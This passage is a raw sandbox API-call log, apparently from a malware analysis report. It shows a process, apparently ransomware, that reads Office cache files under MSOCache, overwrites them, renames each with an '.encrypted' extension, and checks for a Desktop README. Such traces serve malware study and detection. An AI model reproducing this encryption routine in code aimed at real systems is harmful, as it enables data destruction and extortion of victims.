(lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0159.423] GetFileType (hFile=0x4e4) returned 0x1 [0159.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0159.424] GetFileType (hFile=0x4e4) returned 0x1 [0159.424] WriteFile (in: hFile=0x4e4, lpBuffer=0x109e1018*, nNumberOfBytesToWrite=0x102fcc0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x109e1018*, lpNumberOfBytesWritten=0x2ee7c4*=0x102fcc0, lpOverlapped=0x0) returned 1 [0160.430] CloseHandle (hObject=0x4e4) returned 1 [0160.833] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0160.833] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.encrypted", lpFilePart=0x0) returned 0x54 [0160.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0160.833] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x459cef60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x102fcc0)) returned 1 [0160.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0160.834] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.encrypted")) returned 1 [0160.838] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0160.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0160.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0160.838] GetFileType (hFile=0x4e4) returned 0x1 [0160.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0160.838] GetFileType (hFile=0x4e4) returned 0x1 [0160.838] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x61d [0160.839] ReadFile (in: hFile=0x4e4, lpBuffer=0x22847b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22847b4*, lpNumberOfBytesRead=0x2ee7d4*=0x61d, lpOverlapped=0x0) returned 1 [0160.845] CloseHandle (hObject=0x4e4) returned 1 [0160.948] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0160.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0160.949] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0160.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0160.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0160.949] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0160.950] GetFileType (hFile=0x4e4) returned 0x1 [0160.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0160.950] GetFileType (hFile=0x4e4) returned 0x1 [0160.950] WriteFile (in: hFile=0x4e4, lpBuffer=0x22914a4*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22914a4*, lpNumberOfBytesWritten=0x2ee798*=0x620, lpOverlapped=0x0) returned 1 [0160.951] CloseHandle (hObject=0x4e4) returned 1 [0160.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0160.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.encrypted", lpFilePart=0x0) returned 0x55 [0160.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0160.953] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x45ad9900, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x620)) returned 1 [0160.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0160.953] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.encrypted")) returned 1 [0160.955] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0160.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0160.955] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0160.955] GetFileType (hFile=0x4e4) returned 0x1 [0160.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0160.956] GetFileType (hFile=0x4e4) returned 0x1 [0160.956] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x8f8 [0160.956] ReadFile (in: hFile=0x4e4, lpBuffer=0x22930fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22930fc*, lpNumberOfBytesRead=0x2ee7d4*=0x8f8, lpOverlapped=0x0) returned 1 [0160.971] CloseHandle (hObject=0x4e4) returned 1 [0160.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0160.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0160.987] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0160.987] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0160.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0160.988] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0160.989] GetFileType (hFile=0x4e4) returned 0x1 [0160.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0160.989] GetFileType (hFile=0x4e4) returned 0x1 [0160.989] WriteFile (in: hFile=0x4e4, lpBuffer=0x22e3f64*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22e3f64*, lpNumberOfBytesWritten=0x2ee798*=0x900, lpOverlapped=0x0) returned 1 [0160.990] CloseHandle (hObject=0x4e4) returned 1 [0160.991] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0160.991] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0160.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0160.991] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x45b4bd20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x900)) returned 1 [0160.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0160.991] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0160.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0160.992] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0160.992] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0160.992] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eea30 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.998] FindClose (in: hFindFile=0x94eea30 | out: hFindFile=0x94eea30) returned 1 [0160.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0160.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0160.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0160.999] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0161.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0161.000] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94eea30 [0161.000] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x94eea30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0161.001] FindClose (in: hFindFile=0x94eea30 | out: hFindFile=0x94eea30) returned 1 [0161.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0161.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0161.002] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0161.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0161.002] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e4 [0161.003] GetFileType (hFile=0x4e4) returned 0x1 [0161.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0161.003] GetFileType (hFile=0x4e4) returned 0x1 [0161.003] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x5aa [0161.003] ReadFile (in: hFile=0x4e4, lpBuffer=0x22e7b7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22e7b7c*, lpNumberOfBytesRead=0x2ee7d4*=0x5aa, lpOverlapped=0x0) returned 1 [0161.041] CloseHandle (hObject=0x4e4) returned 1 [0161.058] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0161.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0161.058] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 